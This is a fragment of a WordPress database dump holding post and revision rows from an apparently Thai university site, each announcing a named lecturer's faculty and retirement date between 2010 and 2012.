(410, 1, '2019-05-27 07:48:57', '2019-05-27 00:48:57', 'ผู้ช่วยศาสตราจารย์ ดร.พิศมัย  ผลพฤกษ์ไพร\r\n\r\nสังกัด  คณะมนุษยศาสตรืและสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2553', 'ผู้ช่วยศาสตราจารย์ ดร.พิศมัย  ผลพฤกษ์ไพร', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c-%e0%b8%94%e0%b8%a3-%e0%b8%9e%e0%b8%b4', '', '', '2019-05-27 07:48:57', '2019-05-27 00:48:57', '', 0, 'http://172.17.40.11/wp511/?p=410', 0, 'post', '', 0),
(411, 1, '2019-05-27 07:48:57', '2019-05-27 00:48:57', 'ผู้ช่วยศาสตราจารย์ ดร.พิศมัย  ผลพฤกษ์ไพร\r\n\r\nสังกัด  คณะมนุษยศาสตรืและสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2553', 'ผู้ช่วยศาสตราจารย์ ดร.พิศมัย  ผลพฤกษ์ไพร', '', 'inherit', 'closed', 'closed', '', '410-revision-v1', '', '', '2019-05-27 07:48:57', '2019-05-27 00:48:57', '', 410, 'http://172.17.40.11/wp511/?p=411', 0, 'revision', '', 0),
(412, 1, '2019-05-27 07:49:11', '2019-05-27 00:49:11', 'รองศาสตราจารย์ลำดวน  เกษตรสุนทร\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเกาียณอายุราชการ  วันที่ 30 กันยายน 2553', 'รองศาสตราจารย์ลำดวน  เกษตรสุนทร', '', 'publish', 'closed', 'open', '', '%e0%b8%a3%e0%b8%ad%e0%b8%87%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%a5%e0%b8%b3%e0%b8%94%e0%b8%a7%e0%b8%99-%e0%b9%80%e0%b8%81', '', '', '2019-05-27 07:49:11', '2019-05-27 00:49:11', '', 0, 'http://172.17.40.11/wp511/?p=412', 0, 'post', '', 0),
(413, 1, '2019-05-27 07:49:11', '2019-05-27 00:49:11', 'รองศาสตราจารย์ลำดวน  เกษตรสุนทร\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเกาียณอายุราชการ  วันที่ 30 กันยายน 2553', 'รองศาสตราจารย์ลำดวน  เกษตรสุนทร', '', 'inherit', 'closed', 'closed', '', '412-revision-v1', '', '', '2019-05-27 07:49:11', '2019-05-27 00:49:11', '', 412, 'http://172.17.40.11/wp511/?p=413', 0, 'revision', '', 0),
(414, 1, '2019-05-27 07:49:24', '2019-05-27 00:49:24', 'อาจารย์วงศ์แข  ภัทรนิตย์\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2553', 'อาจารย์วงศ์แข  ภัทรนิตย์', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%a7%e0%b8%87%e0%b8%a8%e0%b9%8c%e0%b9%81%e0%b8%82-%e0%b8%a0%e0%b8%b1%e0%b8%97%e0%b8%a3%e0%b8%99%e0%b8%b4%e0%b8%95%e0%b8%a2', '', '', '2019-05-27 07:49:24', '2019-05-27 00:49:24', '', 0, 'http://172.17.40.11/wp511/?p=414', 0, 'post', '', 0),
(415, 1, '2019-05-27 07:49:24', '2019-05-27 00:49:24', 'อาจารย์วงศ์แข  ภัทรนิตย์\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2553', 'อาจารย์วงศ์แข  ภัทรนิตย์', '', 'inherit', 'closed', 'closed', '', '414-revision-v1', '', '', '2019-05-27 07:49:24', '2019-05-27 00:49:24', '', 414, 'http://172.17.40.11/wp511/?p=415', 0, 'revision', '', 0),
(416, 1, '2019-05-27 07:49:37', '2019-05-27 00:49:37', 'ผู้ช่วยศาสตราจารย์วาสนา  จันทรัตน์\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2553', 'ผู้ช่วยศาสตราจารย์วาสนา  จันทรัตน์', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%a7%e0%b8%b2%e0%b8%aa%e0%b8%99', '', '', '2019-05-27 07:49:37', '2019-05-27 00:49:37', '', 0, 'http://172.17.40.11/wp511/?p=416', 0, 'post', '', 0),
(417, 1, '2019-05-27 07:49:37', '2019-05-27 00:49:37', 'ผู้ช่วยศาสตราจารย์วาสนา  จันทรัตน์\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2553', 'ผู้ช่วยศาสตราจารย์วาสนา  จันทรัตน์', '', 'inherit', 'closed', 'closed', '', '416-revision-v1', '', '', '2019-05-27 07:49:37', '2019-05-27 00:49:37', '', 416, 'http://172.17.40.11/wp511/?p=417', 0, 'revision', '', 0),
(418, 1, '2019-05-27 07:49:51', '2019-05-27 00:49:51', 'อาจารย์สมสวาท  เจริญฤทธิ์\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2553', 'อาจารย์สมสวาท  เจริญฤทธิ์', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%aa%e0%b8%a1%e0%b8%aa%e0%b8%a7%e0%b8%b2%e0%b8%97-%e0%b9%80%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%8d%e0%b8%a4%e0%b8%97%e0%b8%98', '', '', '2019-05-27 07:49:51', '2019-05-27 00:49:51', '', 0, 'http://172.17.40.11/wp511/?p=418', 0, 'post', '', 0),
(419, 1, '2019-05-27 07:49:51', '2019-05-27 00:49:51', 'อาจารย์สมสวาท  เจริญฤทธิ์\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2553', 'อาจารย์สมสวาท  เจริญฤทธิ์', '', 'inherit', 'closed', 'closed', '', '418-revision-v1', '', '', '2019-05-27 07:49:51', '2019-05-27 00:49:51', '', 418, 'http://172.17.40.11/wp511/?p=419', 0, 'revision', '', 0),
(420, 1, '2019-05-27 07:50:05', '2019-05-27 00:50:05', 'รองศาสตราจารย์สุรพล  มนัสเสรี\r\n\r\nสังกัด  คณะเทคโนโลยีการเกษตร\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2553', 'รองศาสตราจารย์สุรพล  มนัสเสรี', '', 'publish', 'closed', 'open', '', '%e0%b8%a3%e0%b8%ad%e0%b8%87%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%aa%e0%b8%b8%e0%b8%a3%e0%b8%9e%e0%b8%a5-%e0%b8%a1%e0%b8%99', '', '', '2019-05-27 07:50:05', '2019-05-27 00:50:05', '', 0, 'http://172.17.40.11/wp511/?p=420', 0, 'post', '', 0),
(421, 1, '2019-05-27 07:50:05', '2019-05-27 00:50:05', 'รองศาสตราจารย์สุรพล  มนัสเสรี\r\n\r\nสังกัด  คณะเทคโนโลยีการเกษตร\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2553', 'รองศาสตราจารย์สุรพล  มนัสเสรี', '', 'inherit', 'closed', 'closed', '', '420-revision-v1', '', '', '2019-05-27 07:50:05', '2019-05-27 00:50:05', '', 420, 'http://172.17.40.11/wp511/?p=421', 0, 'revision', '', 0),
(422, 1, '2019-05-27 07:50:19', '2019-05-27 00:50:19', 'ผู้ช่วยศาสตราจารย์ ดร.อุไร  แฉล้ม\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2553', 'ผู้ช่วยศาสตราจารย์ ดร.อุไร  แฉล้ม', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c-%e0%b8%94%e0%b8%a3-%e0%b8%ad%e0%b8%b8', '', '', '2019-05-27 07:50:19', '2019-05-27 00:50:19', '', 0, 'http://172.17.40.11/wp511/?p=422', 0, 'post', '', 0),
(423, 1, '2019-05-27 07:50:19', '2019-05-27 00:50:19', 'ผู้ช่วยศาสตราจารย์ ดร.อุไร  แฉล้ม\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2553', 'ผู้ช่วยศาสตราจารย์ ดร.อุไร  แฉล้ม', '', 'inherit', 'closed', 'closed', '', '422-revision-v1', '', '', '2019-05-27 07:50:19', '2019-05-27 00:50:19', '', 422, 'http://172.17.40.11/wp511/?p=423', 0, 'revision', '', 0),
(424, 1, '2019-05-27 07:50:34', '2019-05-27 00:50:34', 'อาจารย์เอื้อนจิตร  สัมมา\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2553', 'อาจารย์เอื้อนจิตร  สัมมา', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b9%80%e0%b8%ad%e0%b8%b7%e0%b9%89%e0%b8%ad%e0%b8%99%e0%b8%88%e0%b8%b4%e0%b8%95%e0%b8%a3-%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%a1', '', '', '2019-05-27 07:50:34', '2019-05-27 00:50:34', '', 0, 'http://172.17.40.11/wp511/?p=424', 0, 'post', '', 0),
(425, 1, '2019-05-27 07:50:34', '2019-05-27 00:50:34', 'อาจารย์เอื้อนจิตร  สัมมา\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2553', 'อาจารย์เอื้อนจิตร  สัมมา', '', 'inherit', 'closed', 'closed', '', '424-revision-v1', '', '', '2019-05-27 07:50:34', '2019-05-27 00:50:34', '', 424, 'http://172.17.40.11/wp511/?p=425', 0, 'revision', '', 0),
(426, 1, '2019-05-27 07:50:46', '2019-05-27 00:50:46', 'อาจารย์เพ็ญศิริ  ตัณไทย\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่  30 กันยายน 2553', 'อาจารย์เพ็ญศิริ  ตัณไทย', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b9%80%e0%b8%9e%e0%b9%87%e0%b8%8d%e0%b8%a8%e0%b8%b4%e0%b8%a3%e0%b8%b4-%e0%b8%95%e0%b8%b1%e0%b8%93%e0%b9%84%e0%b8%97%e0%b8%a2', '', '', '2019-05-27 07:50:46', '2019-05-27 00:50:46', '', 0, 'http://172.17.40.11/wp511/?p=426', 0, 'post', '', 0),
(427, 1, '2019-05-27 07:50:46', '2019-05-27 00:50:46', 'อาจารย์เพ็ญศิริ  ตัณไทย\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่  30 กันยายน 2553', 'อาจารย์เพ็ญศิริ  ตัณไทย', '', 'inherit', 'closed', 'closed', '', '426-revision-v1', '', '', '2019-05-27 07:50:46', '2019-05-27 00:50:46', '', 426, 'http://172.17.40.11/wp511/?p=427', 0, 'revision', '', 0),
(428, 1, '2019-05-27 07:50:58', '2019-05-27 00:50:58', 'ผู้ช่วยศาสตราจารย์ ดร.ไพโรจน์  ด้วงวิเศษ\r\n\r\nตำแหน่ง  อธิการบดี  ปี พ.ศ. 2546 - 2555\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2554', 'ผู้ช่วยศาสตราจารย์ ดร.ไพโรจน์  ด้วงวิเศษ', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c-%e0%b8%94%e0%b8%a3-%e0%b9%84%e0%b8%9e', '', '', '2019-05-27 07:50:58', '2019-05-27 00:50:58', '', 0, 'http://172.17.40.11/wp511/?p=428', 0, 'post', '', 0),
(429, 1, '2019-05-27 07:50:58', '2019-05-27 00:50:58', 'ผู้ช่วยศาสตราจารย์ ดร.ไพโรจน์  ด้วงวิเศษ\r\n\r\nตำแหน่ง  อธิการบดี  ปี พ.ศ. 2546 - 2555\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2554', 'ผู้ช่วยศาสตราจารย์ ดร.ไพโรจน์  ด้วงวิเศษ', '', 'inherit', 'closed', 'closed', '', '428-revision-v1', '', '', '2019-05-27 07:50:58', '2019-05-27 00:50:58', '', 428, 'http://172.17.40.11/wp511/?p=429', 0, 'revision', '', 0),
(430, 1, '2019-05-27 07:51:08', '2019-05-27 00:51:08', 'ผู้ช่วยศาสตราจารย์ภัทรวดี  องค์สกุล\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2554', 'ผู้ช่วยศาสตราจารย์ภัทรวดี  องค์สกุล', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%a0%e0%b8%b1%e0%b8%97%e0%b8%a3', '', '', '2019-05-27 07:51:08', '2019-05-27 00:51:08', '', 0, 'http://172.17.40.11/wp511/?p=430', 0, 'post', '', 0),
(431, 1, '2019-05-27 07:51:08', '2019-05-27 00:51:08', 'ผู้ช่วยศาสตราจารย์ภัทรวดี  องค์สกุล\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2554', 'ผู้ช่วยศาสตราจารย์ภัทรวดี  องค์สกุล', '', 'inherit', 'closed', 'closed', '', '430-revision-v1', '', '', '2019-05-27 07:51:08', '2019-05-27 00:51:08', '', 430, 'http://172.17.40.11/wp511/?p=431', 0, 'revision', '', 0),
(432, 1, '2019-05-27 07:51:23', '2019-05-27 00:51:23', 'ผู้ช่วยศาสตราจารย์วรงค์  ฤกษ์รุจิพิมล\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2554', 'ผู้ช่วยศาสตราจารย์วรงค์  ฤกษ์รุจิพิมล', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%a7%e0%b8%a3%e0%b8%87%e0%b8%84', '', '', '2019-05-27 07:51:23', '2019-05-27 00:51:23', '', 0, 'http://172.17.40.11/wp511/?p=432', 0, 'post', '', 0),
(433, 1, '2019-05-27 07:51:23', '2019-05-27 00:51:23', 'ผู้ช่วยศาสตราจารย์วรงค์  ฤกษ์รุจิพิมล\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2554', 'ผู้ช่วยศาสตราจารย์วรงค์  ฤกษ์รุจิพิมล', '', 'inherit', 'closed', 'closed', '', '432-revision-v1', '', '', '2019-05-27 07:51:23', '2019-05-27 00:51:23', '', 432, 'http://172.17.40.11/wp511/?p=433', 0, 'revision', '', 0),
(434, 1, '2019-05-27 07:51:36', '2019-05-27 00:51:36', 'ศาสตราจารย์อำนวย  ยัสโยธา\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2555', 'ศาสตราจารย์อำนวย  ยัสโยธา', '', 'publish', 'closed', 'open', '', '%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%ad%e0%b8%b3%e0%b8%99%e0%b8%a7%e0%b8%a2-%e0%b8%a2%e0%b8%b1%e0%b8%aa%e0%b9%82%e0%b8%a2', '', '', '2019-05-27 07:51:36', '2019-05-27 00:51:36', '', 0, 'http://172.17.40.11/wp511/?p=434', 0, 'post', '', 0),
(435, 1, '2019-05-27 07:51:36', '2019-05-27 00:51:36', 'ศาสตราจารย์อำนวย  ยัสโยธา\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2555', 'ศาสตราจารย์อำนวย  ยัสโยธา', '', 'inherit', 'closed', 'closed', '', '434-revision-v1', '', '', '2019-05-27 07:51:36', '2019-05-27 00:51:36', '', 434, 'http://172.17.40.11/wp511/?p=435', 0, 'revision', '', 0),
(436, 1, '2019-05-27 07:51:47', '2019-05-27 00:51:47', 'รองศาสตราจารย์เกษม  ขนาบแก้ว\r\n\r\nสังกัด  คณุมนุษยศาสตรืและสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2555', 'รองศาสตราจารย์เกษม  ขนาบแก้ว', '', 'publish', 'closed', 'open', '', '%e0%b8%a3%e0%b8%ad%e0%b8%87%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b9%80%e0%b8%81%e0%b8%a9%e0%b8%a1-%e0%b8%82%e0%b8%99%e0%b8%b2', '', '', '2019-05-27 07:51:47', '2019-05-27 00:51:47', '', 0, 'http://172.17.40.11/wp511/?p=436', 0, 'post', '', 0),
(437, 1, '2019-05-27 07:51:47', '2019-05-27 00:51:47', 'รองศาสตราจารย์เกษม  ขนาบแก้ว\r\n\r\nสังกัด  คณุมนุษยศาสตรืและสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2555', 'รองศาสตราจารย์เกษม  ขนาบแก้ว', '', 'inherit', 'closed', 'closed', '', '436-revision-v1', '', '', '2019-05-27 07:51:47', '2019-05-27 00:51:47', '', 436, 'http://172.17.40.11/wp511/?p=437', 0, 'revision', '', 0),
(438, 1, '2019-05-27 07:52:00', '2019-05-27 00:52:00', 'ผู้ช่วยศาสตราจารย์โกวิท  จิตบรรจง\r\n\r\nสังกัด  คณะวิทยาการจัดการ\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2555', 'ผู้ช่วยศาสตราจารย์โกวิท  จิตบรรจง', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b9%82%e0%b8%81%e0%b8%a7%e0%b8%b4', '', '', '2019-05-27 07:52:00', '2019-05-27 00:52:00', '', 0, 'http://172.17.40.11/wp511/?p=438', 0, 'post', '', 0),
(439, 1, '2019-05-27 07:52:00', '2019-05-27 00:52:00', 'ผู้ช่วยศาสตราจารย์โกวิท  จิตบรรจง\r\n\r\nสังกัด  คณะวิทยาการจัดการ\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2555', 'ผู้ช่วยศาสตราจารย์โกวิท  จิตบรรจง', '', 'inherit', 'closed', 'closed', '', '438-revision-v1', '', '', '2019-05-27 07:52:00', '2019-05-27 00:52:00', '', 438, 'http://172.17.40.11/wp511/?p=439', 0, 'revision', '', 0),
(440, 1, '2019-05-27 07:52:12', '2019-05-27 00:52:12', 'ผู้ช่วยศาสตราจารย์ ดร.ประสิทธิ์  สังขมณี\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2555', 'ผู้ช่วยศาสตราจารย์ ดร.ประสิทธิ์  สังขมณี', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c-%e0%b8%94%e0%b8%a3-%e0%b8%9b%e0%b8%a3', '', '', '2019-05-27 07:52:12', '2019-05-27 00:52:12', '', 0, 'http://172.17.40.11/wp511/?p=440', 0, 'post', '', 0),
(441, 1, '2019-05-27 07:52:12', '2019-05-27 00:52:12', 'ผู้ช่วยศาสตราจารย์ ดร.ประสิทธิ์  สังขมณี\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2555', 'ผู้ช่วยศาสตราจารย์ ดร.ประสิทธิ์  สังขมณี', '', 'inherit', 'closed', 'closed', '', '440-revision-v1', '', '', '2019-05-27 07:52:12', '2019-05-27 00:52:12', '', 440, 'http://172.17.40.11/wp511/?p=441', 0, 'revision', '', 0),
(442, 1, '2019-05-27 07:52:25', '2019-05-27 00:52:25', 'รองศาสตราจารย์วิไลลักษณ์  เล็กศิริรัตน์\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่  30 กันยายน 2555', 'รองศาสตราจารย์วิไลลักษณ์  เล็กศิริรัตน์', '', 'publish', 'closed', 'open', '', '%e0%b8%a3%e0%b8%ad%e0%b8%87%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%a7%e0%b8%b4%e0%b9%84%e0%b8%a5%e0%b8%a5%e0%b8%b1%e0%b8%81%e0%b8%a9', '', '', '2019-05-27 07:52:25', '2019-05-27 00:52:25', '', 0, 'http://172.17.40.11/wp511/?p=442', 0, 'post', '', 0),
(443, 1, '2019-05-27 07:52:25', '2019-05-27 00:52:25', 'รองศาสตราจารย์วิไลลักษณ์  เล็กศิริรัตน์\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่  30 กันยายน 2555', 'รองศาสตราจารย์วิไลลักษณ์  เล็กศิริรัตน์', '', 'inherit', 'closed', 'closed', '', '442-revision-v1', '', '', '2019-05-27 07:52:25', '2019-05-27 00:52:25', '', 442, 'http://172.17.40.11/wp511/?p=443', 0, 'revision', '', 0),
(444, 1, '2019-05-27 07:52:38', '2019-05-27 00:52:38', 'ผู้ช่วยศาสตราจารย์สุภฤกษ์  ทองประยูร\r\n\r\nสังกัด  คณะศิลปกรรมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่  30  กันยายน 2555', 'ผู้ช่วยศาสตราจารย์สุภฤกษ์  ทองประยูร', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%aa%e0%b8%b8%e0%b8%a0%e0%b8%a4', '', '', '2019-05-27 07:52:38', '2019-05-27 00:52:38', '', 0, 'http://172.17.40.11/wp511/?p=444', 0, 'post', '', 0),
(445, 1, '2019-05-27 07:52:38', '2019-05-27 00:52:38', 'ผู้ช่วยศาสตราจารย์สุภฤกษ์  ทองประยูร\r\n\r\nสังกัด  คณะศิลปกรรมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่  30  กันยายน 2555', 'ผู้ช่วยศาสตราจารย์สุภฤกษ์  ทองประยูร', '', 'inherit', 'closed', 'closed', '', '444-revision-v1', '', '', '2019-05-27 07:52:38', '2019-05-27 00:52:38', '', 444, 'http://172.17.40.11/wp511/?p=445', 0, 'revision', '', 0),
(446, 1, '2019-05-27 07:52:53', '2019-05-27 00:52:53', 'ผู้ช่วยศาสตราจารย์สุพล  เพชรานนท์\r\n\r\nสังกัด  คณะวิทยาการจัดการ\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2555', 'ผู้ช่วยศาสตราจารย์สุพล  เพชรานนท์', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%aa%e0%b8%b8%e0%b8%9e%e0%b8%a5', '', '', '2019-05-27 07:52:53', '2019-05-27 00:52:53', '', 0, 'http://172.17.40.11/wp511/?p=446', 0, 'post', '', 0),
(447, 1, '2019-05-27 07:52:53', '2019-05-27 00:52:53', 'ผู้ช่วยศาสตราจารย์สุพล  เพชรานนท์\r\n\r\nสังกัด  คณะวิทยาการจัดการ\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2555', 'ผู้ช่วยศาสตราจารย์สุพล  เพชรานนท์', '', 'inherit', 'closed', 'closed', '', '446-revision-v1', '', '', '2019-05-27 07:52:53', '2019-05-27 00:52:53', '', 446, 'http://172.17.40.11/wp511/?p=447', 0, 'revision', '', 0),
(448, 1, '2019-05-27 07:53:07', '2019-05-27 00:53:07', 'รองศาสตราจารย์ ดร.เสาวภา  โชติเกษมศรี\r\n\r\nสังกัด  คณะวิทยาศาสตร์และเทคโนโลยี\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2555', 'รองศาสตราจารย์ ดร.เสาวภา  โชติเกษมศรี', '', 'publish', 'closed', 'open', '', '%e0%b8%a3%e0%b8%ad%e0%b8%87%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c-%e0%b8%94%e0%b8%a3-%e0%b9%80%e0%b8%aa%e0%b8%b2%e0%b8%a7%e0%b8%a0%e0%b8%b2', '', '', '2019-05-27 07:53:07', '2019-05-27 00:53:07', '', 0, 'http://172.17.40.11/wp511/?p=448', 0, 'post', '', 0),
(449, 1, '2019-05-27 07:53:07', '2019-05-27 00:53:07', 'รองศาสตราจารย์ ดร.เสาวภา  โชติเกษมศรี\r\n\r\nสังกัด  คณะวิทยาศาสตร์และเทคโนโลยี\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2555', 'รองศาสตราจารย์ ดร.เสาวภา  โชติเกษมศรี', '', 'inherit', 'closed', 'closed', '', '448-revision-v1', '', '', '2019-05-27 07:53:07', '2019-05-27 00:53:07', '', 448, 'http://172.17.40.11/wp511/?p=449', 0, 'revision', '', 0),
